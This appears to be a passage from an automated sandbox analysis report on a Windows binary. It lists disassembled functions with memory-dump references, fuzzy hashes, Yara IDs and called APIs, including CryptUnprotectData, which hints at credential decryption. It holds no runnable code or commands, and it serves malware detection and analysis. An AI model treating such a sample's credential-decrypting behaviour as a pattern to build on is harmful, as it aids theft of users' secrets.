                                  • Associated: 00000000.00000002.2175605454.0000000000BA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000BCC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000CDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000CE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000D0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000E76000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000000E8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000001007000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.00000000010E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000001107000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000110D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000111D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176090990.000000000111E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176203878.00000000012B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176220401.00000000012B3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                                  • String ID:
                                  • API String ID: 3317088062-0
                                  • Opcode ID: 161db8e96e599904417ab2fd8231594e0c846f613653cd7ddd8fbe0bccac70d1
                                  • Instruction ID: 0f863ee44cada712b3398ab8ce47817acfd585eb52c957a9c5bbc16961981317
                                  • Opcode Fuzzy Hash: 161db8e96e599904417ab2fd8231594e0c846f613653cd7ddd8fbe0bccac70d1
                                  • Instruction Fuzzy Hash: A6118EB1949218EFEB20DF55DC45FA9BBB8FB44711F1003E9F619A32E0DB745A848B50
                                  Function 00FF1F29 Relevance: 5.4, Strings: 3, Instructions: 1626COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2175839429.0000000000E8A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2175605454.0000000000BA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000BCC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000CDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000CE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000D0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000E76000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000001007000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.00000000010E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000001107000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000110D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000111D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176090990.000000000111E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176203878.00000000012B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176220401.00000000012B3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: 3B?d$4J3$HO\
                                  • API String ID: 0-3104957160
                                  • Opcode ID: b50ebdfcba7c4b821547a191e0fe9e64eb644ff4bd623a4308261b5fb7c55b4a
                                  • Instruction ID: a039c29049ee2c655061c582d082a1859a57f7d4a57e27ec432e61ca00c57fa4
                                  • Opcode Fuzzy Hash: b50ebdfcba7c4b821547a191e0fe9e64eb644ff4bd623a4308261b5fb7c55b4a
                                  • Instruction Fuzzy Hash: 77B225F3A0C2049FE304AE29EC8567AFBE5EF98720F16493DE6C4C3744E63598458697
                                  Function 00BB3970 Relevance: 4.6, APIs: 3, Instructions: 100comCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CoCreateInstance.COMBASE(00BBE120,00000000,00000001,00BBE110,00000000), ref: 00BB39A8
                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 00BB3A00
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2175620946.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2175605454.0000000000BA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000BCC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000CDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000CE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000D0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000E76000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000000E8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000001007000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.00000000010E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000001107000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000110D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000111D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176090990.000000000111E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176203878.00000000012B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176220401.00000000012B3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ByteCharCreateInstanceMultiWide
                                  • String ID:
                                  • API String ID: 123533781-0
                                  • Opcode ID: 920b264a5d9a44dbf7a68683a0db156a2cb84a3e72ee55b7cdd6c304093c2d4b
                                  • Instruction ID: f2c925f40ea14f6f4168663bc1d5c39a001d1fb3fe7f1899a6c0eba98e51556e
                                  • Opcode Fuzzy Hash: 920b264a5d9a44dbf7a68683a0db156a2cb84a3e72ee55b7cdd6c304093c2d4b
                                  • Instruction Fuzzy Hash: 1B410970A40A289FDB24DB58CC95BDBB7B4AB48702F5041D8E619E72A0D7B16EC5CF50
                                  Function 00BAA2B0 Relevance: 4.6, APIs: 3, Instructions: 51memoryencryptionCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00BAA2D4
                                  • LocalAlloc.KERNEL32(00000040,00000000), ref: 00BAA2F3
                                  • LocalFree.KERNEL32(?), ref: 00BAA323
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2175620946.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2175605454.0000000000BA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000BCC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000CDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000CE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000D0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000E76000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000000E8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000001007000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.00000000010E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000001107000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000110D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000111D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176090990.000000000111E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176203878.00000000012B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176220401.00000000012B3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Local$AllocCryptDataFreeUnprotect
                                  • String ID:
                                  • API String ID: 2068576380-0
                                  • Opcode ID: cdff6282b476a6a738fa2f469675c9c59b36e7523ce11ad9fa3e5a2e44102013
                                  • Instruction ID: 45fdf4323cc3a58fb0ef2475b1ac9e1615d00fe043bfb895044f1a87f02e5576
                                  • Opcode Fuzzy Hash: cdff6282b476a6a738fa2f469675c9c59b36e7523ce11ad9fa3e5a2e44102013
                                  • Instruction Fuzzy Hash: B111B7B8A00209EFCB04DFA5D985AAEB7B5FF89300F1045A9ED15A7350D730AE54CF61
                                  Function 00FED779 Relevance: 3.5, Strings: 2, Instructions: 952COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2175839429.0000000000E8A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2175605454.0000000000BA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000BCC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000CDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000CE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000D0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000E76000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000001007000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.00000000010E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000001107000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000110D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000111D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176090990.000000000111E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176203878.00000000012B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176220401.00000000012B3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: 34$bM5
                                  • API String ID: 0-608696887
                                  • Opcode ID: a8e99287ab55b8bb49fc20abb1d60579ef9dac2d793788e5bc5d251f6c14043b
                                  • Instruction ID: 407ee019bb89ea0049402ee24aca231dc94b719801b04fc8e174cd02625386c1
                                  • Opcode Fuzzy Hash: a8e99287ab55b8bb49fc20abb1d60579ef9dac2d793788e5bc5d251f6c14043b
                                  • Instruction Fuzzy Hash: 0F52E6F360C2049FD304AE2DEC8577AFBE9EF94720F16852DEAC4C3744EA3558458696
                                  Function 00C14BA8 Relevance: 3.4, Strings: 2, Instructions: 941COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2175620946.0000000000BCC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2175605454.0000000000BA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000CDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000CE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000D0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000E76000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000000E8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000001007000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.00000000010E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000001107000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000110D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000111D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176090990.000000000111E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176203878.00000000012B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176220401.00000000012B3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: ?$__ZN
                                  • API String ID: 0-1427190319
                                  • Opcode ID: 5979ebcfade6a94da10809392b5ca83137eebb76b9c6aa0d0269130114abb242
                                  • Instruction ID: d2d7bb67f78d17b01ceb68b45f2e6ce87ad863c324919a1598a79620ffbddea5
                                  • Opcode Fuzzy Hash: 5979ebcfade6a94da10809392b5ca83137eebb76b9c6aa0d0269130114abb242
                                  • Instruction Fuzzy Hash: 3B720472908B50DFD718CF14C8906AEB7E2AFD6310F698A1DF4A55B391D370DD82AB81
                                  Function 00FF5D2C Relevance: 3.4, Strings: 2, Instructions: 888COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2175839429.0000000000E8A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2175605454.0000000000BA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000BCC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000CDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000CE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000D0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000E76000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000001007000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.00000000010E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000001107000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000110D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000111D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176090990.000000000111E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176203878.00000000012B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176220401.00000000012B3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: EdW~$WYmy
                                  • API String ID: 0-160116925
                                  • Opcode ID: 5f458d0497c9e6e112d1be09caf5175d0a4482aebdbeb2e85c9970379e279c45
                                  • Instruction ID: 0c1a7aa12767ef8f82f2c9f58b7b430c439af5c872cf044fbaf42af9d66e8725
                                  • Opcode Fuzzy Hash: 5f458d0497c9e6e112d1be09caf5175d0a4482aebdbeb2e85c9970379e279c45
                                  • Instruction Fuzzy Hash: 8652E5F390C6109FE304AE2DDC8577AB7E9EF94720F1A492DEAC487344E63598408797
                                  Function 00BF5DB9 Relevance: 2.5, Strings: 1, Instructions: 1234COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2175620946.0000000000BCC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2175605454.0000000000BA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000CDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000CE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000D0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000E76000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000000E8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000001007000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.00000000010E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000001107000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000110D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000111D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176090990.000000000111E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176203878.00000000012B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176220401.00000000012B3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: xn--
                                  • API String ID: 0-2826155999
                                  • Opcode ID: 7df6ecad3ed0aeae1596bd114aa1f7039c484854ff8b1381d6cb73b44afb5762
                                  • Instruction ID: 2fa206f20abbf72ba79a5dcfdfc9885706d4f9fbaaf4438aa6d8525a590cf3e7
                                  • Opcode Fuzzy Hash: 7df6ecad3ed0aeae1596bd114aa1f7039c484854ff8b1381d6cb73b44afb5762
                                  • Instruction Fuzzy Hash: 58A2D0B1C0426C8AEF18CB68C8913FDBBF1EF45300F1842EADA5677281D7755E899B51
                                  Function 00FEBA94 Relevance: 2.3, Strings: 1, Instructions: 1059COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2175839429.0000000000E8A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2175605454.0000000000BA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000BCC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000CDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000CE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000D0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000E76000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000001007000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.00000000010E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000001107000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000110D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000111D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176090990.000000000111E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176203878.00000000012B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176220401.00000000012B3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: @Wo
                                  • API String ID: 0-1932671980
                                  • Opcode ID: 03cda79ea800828b07625b9aa02000512139942b8941ecefcecb25e5a8b996bd
                                  • Instruction ID: 2648c6ead367dddcae3e0a3b4a6de579f7238e498045a325c01a73c7671b2cca
                                  • Opcode Fuzzy Hash: 03cda79ea800828b07625b9aa02000512139942b8941ecefcecb25e5a8b996bd
                                  • Instruction Fuzzy Hash: C572C3F39086009FE304AE2DEC8577ABBE5EF94720F1A493DEAC4C7744E63598448697
                                  Function 00BF4DC8 Relevance: 1.9, APIs: 1, Instructions: 411COMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2175620946.0000000000BCC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2175605454.0000000000BA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000CDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000CE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000D0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000E76000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000000E8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000001007000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.00000000010E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000001107000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000110D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000111D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176090990.000000000111E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176203878.00000000012B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176220401.00000000012B3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: __aulldiv
                                  • String ID:
                                  • API String ID: 3732870572-0
                                  • Opcode ID: c14b47d2e213c3a0e8374cf111387a659401d06af651524ed7eee9bee9842815
                                  • Instruction ID: 319c46f03fff9002e98beba0295cbf3c4054a9e3ae7f34eefc1e571c52e5fee0
                                  • Opcode Fuzzy Hash: c14b47d2e213c3a0e8374cf111387a659401d06af651524ed7eee9bee9842815
                                  • Instruction Fuzzy Hash: DEE1D2316083499FC735CE28C8807BFB7E2EF89300F554A6DE6D997291DB319949CB82
                                  Function 00BF4868 Relevance: 1.9, APIs: 1, Instructions: 400COMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2175620946.0000000000BCC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2175605454.0000000000BA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000CDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000CE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000D0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000E76000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000000E8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000001007000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.00000000010E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000001107000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000110D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000111D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176090990.000000000111E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176203878.00000000012B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176220401.00000000012B3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: __aulldiv
                                  • String ID:
                                  • API String ID: 3732870572-0
                                  • Opcode ID: 83317d89dfdf25b5cbfc261f48c526b848a7f8a57d589ef9335097789b789f81
                                  • Instruction ID: 4e3d70ad446b553db1d17942c33f1e1bfbeb3c6b7d877c2635bf648155266ef7
                                  • Opcode Fuzzy Hash: 83317d89dfdf25b5cbfc261f48c526b848a7f8a57d589ef9335097789b789f81
                                  • Instruction Fuzzy Hash: 7AE1C431A083099FDB24CE18C8917BFB7E2EFC5310F15896DEA9997251D730EC498B46
                                  Function 00FF4639 Relevance: 1.9, Strings: 1, Instructions: 603COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2175839429.0000000000E8A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2175605454.0000000000BA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000BCC000.00000040.00000001.01000000.00000003.sdmpDownload File
